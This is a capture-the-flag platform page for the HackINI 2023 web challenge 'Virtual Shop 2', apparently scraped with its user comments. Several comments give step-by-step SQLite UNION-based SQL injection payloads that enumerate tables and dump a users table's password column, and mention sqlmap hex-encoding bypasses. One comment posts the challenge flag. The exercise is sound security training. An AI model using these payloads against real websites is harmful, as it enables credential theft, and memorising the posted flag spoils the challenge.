Virtual Shop 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 372
提  示:
描  述:
I'm not making the same mistake again this time, you can't guess my\ \ tables now.\n \n\n **Author**: F100w
评论
你不懂的吧 1年前

3、查出具体表的字段: ' union SELECT pw789,null,null,null FROM UsEErrSS1337987 --+

回复 0

你不懂的吧 1年前

1、查出表有哪些表: ' union SELECT name,null,null,null FROM sqlite_master WHERE type='table' ; 2、查出表有哪些列 :' union SELECT sql,null,null,null FROM sqlite_master WHERE type='table' AND name='UsEErrSS1337987';

回复 1

smtall 1年前

sqlmap使用hex编码提取数据(绕过限制)

回复 0

MoCaser 1年前

我......我......我一把梭战神口牙!!

回复 0

lq61618 2年前

shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

回复 0

xiaobai568 2年前

我写了个WP,描述了手工注入的过程

回复 0

啊这这 2年前

我的sqlmap没跑出来 用的level3 不过我花了十几分钟学了一下sqlite使用 做出来了 还是不错的

回复 0
xiaoxiao972521 2年前

不晓得,sqlmap一把过

回复 0

justsosoloveyou 2年前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(usnme324||':'||pw789) FROM UsEErrSS1337987)--+

回复 0

zhangye 2年前

sqlmap跑时把之前跑的文件删了,不然给的是1的flag

回复 3

hopeinhand 3年前

sqlmap一把梭

回复 0

WriteUp

image
sanshi

1 金币

评分(0)

暂无评分

解题动态

青岛闪电 攻破了该题 9分钟前
风花雪月 攻破了该题 1天前
guity 攻破了该题 5天前
bugbiubiubiu 攻破了该题 5天前
晨曦静夜 攻破了该题 6天前
dddddddwww 攻破了该题 11天前
wuzhouwo 攻破了该题 14天前
低调申 攻破了该题 20天前
ha1@! 攻破了该题 20天前
xiaoxiang07 攻破了该题 21天前
wooluo 攻破了该题 21天前
Vluae 攻破了该题 29天前
Jay. 攻破了该题 1月前
Dxmax 攻破了该题 1月前
denglonghua 攻破了该题 1月前
i8vkmmju 攻破了该题 1月前
pinus 攻破了该题 1月前
xiaodou 攻破了该题 1月前
Yan123 攻破了该题 1月前
879205607 攻破了该题 1月前
问题反馈